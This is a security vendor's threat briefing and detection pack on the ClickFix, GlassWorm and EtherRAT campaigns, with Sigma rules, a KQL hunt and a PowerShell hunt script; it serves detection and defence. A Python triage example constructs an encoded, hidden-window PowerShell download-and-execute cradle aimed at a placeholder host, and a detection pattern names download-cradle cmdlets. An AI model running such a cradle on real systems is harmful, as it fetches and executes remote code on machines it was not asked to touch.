
ClickFix, GlassWorm & EtherRAT: Multi-Vector Social Engineering and Blockchain C2 Campaigns — Enterprise Detection Pack

Security Arsenal Team
April 28, 2026

Threat Intelligence Briefing: Multi-Vector Campaigns Leveraging LotL and Blockchain C2

Threat Summary

Recent OTX pulse data indicates a surge in sophisticated initial access vectors combining social engineering with supply chain compromises. We are tracking three distinct clusters: ClickFix campaigns distributing information stealers (Lumma, Vidar) via browser-based social engineering; GlassWorm, a modular infostealer targeting developers through compromised code repositories; and EtherRAT, a North Korean APT-linked Node.js backdoor utilizing "EtherHiding" to store C2 infrastructure within Ethereum smart contracts. Collectively, these threats bypass traditional network defenses by living off the land (LotL), abusing blockchain technology for resilience, and leveraging trusted developer tools.

Threat Actor / Malware Profile

ClickFix Clusters (Vidar, Lumma, Redline)

  • Distribution: Social engineering campaigns impersonating Intuit QuickBooks and Booking.com. Victims are manipulated into copying and pasting malicious commands into native system tools (Terminal/PowerShell).
  • Payload Behavior: Information stealers targeting credentials, cookies, and cryptocurrency wallets.
  • C2 Communication: HTTP/HTTPS to compromised domains (e.g., ustazazharidrus.com, account-help.info).
  • Persistence: Scheduled tasks or registry run keys established via the initial script.
  • Anti-Analysis: Heavy obfuscation in the initial batch/PowerShell stages to evade signature detection.

GlassWorm

  • Distribution: Supply chain attack via compromised package managers (npm, PyPI) targeting software developers.
  • Payload Behavior: Fingerprinting machine environment, fetching payloads via the Solana blockchain, installing a fake browser extension for surveillance, and deploying a RAT.
  • C2 Communication: Uses Solana blockchain for payload retrieval; standard HTTP for data exfiltration.
  • Persistence: Malicious browser extensions injected into developer profiles.

EtherRAT (North Korean APT)

  • Distribution: IT support scams and likely malicious Node.js packages.
  • Payload Behavior: Node.js based backdoor allowing arbitrary command execution, system info gathering (via sys_info module), and asset theft.
  • C2 Communication: "EtherHiding"—extracts C2 addresses from Ethereum smart contract transaction input data. Uses CDN-like beaconing to blend in with legitimate web traffic.
  • Persistence: Windows service or scheduled task masquerading as a system update.

IOC Analysis

The provided indicators consist primarily of domains and hostnames associated with the ClickFix and EtherRAT campaigns.

  • Indicator Types:
    • Domains: ustazazharidrus.com, account-help.info, o-parana.com, jariosos.com.
    • Hostnames: rpc.payload.de.
  • Operationalization: SOC teams should immediately block these domains at the perimeter (DNS Firewall / Proxy) and hunt for historical DNS resolution events over the last 60 days. Given the use of "EtherHiding" and domain generation algorithms (DGAs), relying solely on static IOCs is insufficient; behavioral detection of Node.js processes and PowerShell execution is required.
  • Decoding Tooling: Use CyberChef or standard base64 decoders for the obfuscated scripts often dropped by ClickFix.

Detection Engineering

Sigma Rules

YAML
title: ClickFix Suspicious PowerShell via Clipboard
date: 2026/04/29
status: experimental
description: Detects potential ClickFix activity where PowerShell is invoked with flags typical of copy-paste social engineering attacks (e.g., hidden window, encoded commands) spawned by user interaction processes like browsers or explorer.
references:
    - https://otx.alienvault.com/pulse/626ba6b3970a16d2f95c8f2c
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\firefox.exe'
            - '\explorer.exe'
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - ' -w hidden'
            - ' -enc '
            - ' -nop '
            - 'CopyToClipboard'
    condition: selection
falsepositives:
    - Legitimate administrative scripts
level: high
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1059.001
    - clickfix
---
title: EtherRAT Node.js Process Network Activity
date: 2026/04/29
status: experimental
description: Detects Node.js processes establishing network connections, suspicious for EtherRAT backdoor activity or malware utilizing Node.js payloads.
references:
    - https://otx.alienvault.com/pulse/626ba6b3970a16d2f95c8f2d
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\node.exe'
        Initiated: 'true'
    filter_legit:
        # exact port values: a substring match on '80' would also swallow 8000, 1800, etc.
        DestinationPort:
            - 80
            - 443
            - 8080
    condition: selection and not filter_legit
falsepositives:
    - Legitimate Node.js web servers running locally
level: medium
tags:
    - attack.command_and_control
    - attack.t1071.001
    - etherrat
---
title: Suspicious Browser Extension Registry Modification
date: 2026/04/29
status: experimental
description: Detects registry modifications that add or update browser extensions, potentially indicating GlassWorm or other extension-based malware persistence.
references:
    - https://otx.alienvault.com/pulse/626ba6b3970a16d2f95c8f2e
author: Security Arsenal
logsource:
    category: registry_set
    product: windows
detection:
    # In Sysmon registry_set events the value name is the tail of TargetObject and
    # Details carries the value data (here the extension's update URL).
    selection_chrome:
        TargetObject|contains: '\Software\Google\Chrome\Extensions\'
        TargetObject|endswith: '\update_url'
    selection_edge:
        TargetObject|contains: '\Software\Microsoft\Edge\Extensions\'
    filter_store:
        Details|contains:
            - 'clients2.google.com'
            - 'edge.microsoft.com'
    condition: 1 of selection* and not filter_store
falsepositives:
    - Legitimate software installing extensions
level: medium
tags:
    - attack.persistence
    - attack.t1176
    - glassworm
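As an added example (not part of the original detection pack), the Python below applies the first Sigma rule's selection to constructed process-creation events and then performs the decoding step the IOC section assigns to CyberChef: a PowerShell -enc/-EncodedCommand argument is base64 of UTF-16LE text, so decoding it in the triage pipeline exposes the download cradle that the raw command line hides. The sample events, the placeholder payload and the reserved example.invalid URL are all constructed.

```python
import base64
import ntpath
import re

# Constructed sample process-creation events (not real telemetry). The -enc
# payload is a constructed placeholder pointing at a reserved .invalid domain.
ENC = base64.b64encode("iwr http://example.invalid/v | iex".encode("utf-16le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": PS, "CommandLine": f"powershell.exe -w hidden -nop -enc {ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": PS, "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": PS, "CommandLine": r"powershell.exe -w hidden -nop -File C:\agent\run.ps1"},
]

# Same terms as the Sigma selection: user-facing parents, powershell image, suspicious flags.
PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
FLAGS = (" -w hidden", " -enc ", " -nop ", "copytoclipboard")
# Download-cradle cmdlets and aliases worth flagging once the payload is readable.
CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I)

def decode_encoded_command(cmdline):
    """Return the -enc/-EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def matches_clickfix_rule(event):
    """Apply the Sigma rule's selection to one process-creation event."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmd = event["CommandLine"].lower()
    return parent in PARENTS and image == "powershell.exe" and any(f in cmd for f in FLAGS)

def triage(events):
    """Return (command line, decoded payload or None, cradle seen) for each matching event."""
    hits = []
    for ev in events:
        if matches_clickfix_rule(ev):
            decoded = decode_encoded_command(ev["CommandLine"])
            hits.append((ev["CommandLine"], decoded, bool(decoded and CRADLE.search(decoded))))
    return hits
```

Only the browser-spawned, encoded event is returned; the service-spawned one carries the same flags but fails the parent check, which is what keeps the rule's false-positive note about administrative scripts manageable.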

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and EtherRAT Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any ("ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com", "o-parana.com", "rpc.payload.de", "jariosos.com", "hayesmed.com", "regancontrols.com", "salinasrent.com", "justtalken.com", "mebeliotmasiv.com")
| summarize Count = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Count desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for ClickFix, GlassWorm, and EtherRAT artifacts.
.DESCRIPTION
    Checks DNS cache for malicious domains, registry for suspicious browser extensions, and processes for Node.js anomalies.
#>

$MaliciousDomains = @(
    "ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com",
    "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com",
    "o-parana.com", "rpc.payload.de", "jariosos.com", "hayesmed.com",
    "regancontrols.com", "salinasrent.com", "justtalken.com", "mebeliotmasiv.com"
)

Write-Host "[*] Checking DNS cache for malicious domains..."
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($Domain in $MaliciousDomains) {
    # Match the domain itself and any subdomain of it
    $Found = $DnsCache | Where-Object { $_.Entry -eq $Domain -or $_.Entry -like "*.$Domain" }
    foreach ($Entry in $Found) {
        Write-Host "[!] Suspicious DNS entry found: $($Entry.Entry) - Data: $($Entry.Data)" -ForegroundColor Red
    }
}

Write-Host "[*] Checking for suspicious browser extensions (Chrome/Edge)..."
$Paths = @(
    "HKCU:\Software\Google\Chrome\Extensions",
    "HKLM:\Software\Google\Chrome\Extensions",
    "HKCU:\Software\Microsoft\Edge\Extensions",
    "HKLM:\Software\Microsoft\Edge\Extensions"
)
# update_url hosts used by the official Chrome and Edge stores; anything else warrants review
$KnownStores = 'clients2\.google\.com|edge\.microsoft\.com'

foreach ($Path in $Paths) {
    if (Test-Path $Path) {
        Get-ChildItem $Path -ErrorAction SilentlyContinue | ForEach-Object {
            $ExtId = $_.PSChildName
            $UpdateUrl = (Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue).update_url
            if ($UpdateUrl -and $UpdateUrl -notmatch $KnownStores) {
                Write-Host "[!] Non-store update URL for extension $ExtId under $Path : $UpdateUrl" -ForegroundColor Yellow
            }
        }
    }
}

Write-Host "[*] Checking for Node.js processes with network connections..."
# Resolve the processes first so Get-NetTCPConnection is never called with a null PID
$NodeProcs = Get-Process -Name node -ErrorAction SilentlyContinue
if ($NodeProcs) {
    $NodeConns = Get-NetTCPConnection -OwningProcess $NodeProcs.Id -ErrorAction SilentlyContinue
    if ($NodeConns) {
        $NodeConns | Format-Table LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess -AutoSize
    }
}

Response Priorities

  • Immediate:
    • Block all listed domains and hostnames at the DNS resolver and proxy level.
    • Hunt for powershell.exe processes spawned by browsers.
  • 24 Hours:
    • Audit developer workstations for signs of GlassWorm (unusual browser extensions, Solana blockchain interaction).
    • Verify identity and session integrity for developers and finance staff due to infostealer presence (Vidar/Lumma).
  • 1 Week:
    • Implement strict allowlisting for browser extensions.
    • Review and restrict Node.js execution policies in production environments.
    • Update security awareness training to include "ClickFix" scenarios (fake tech support asking users to paste code).
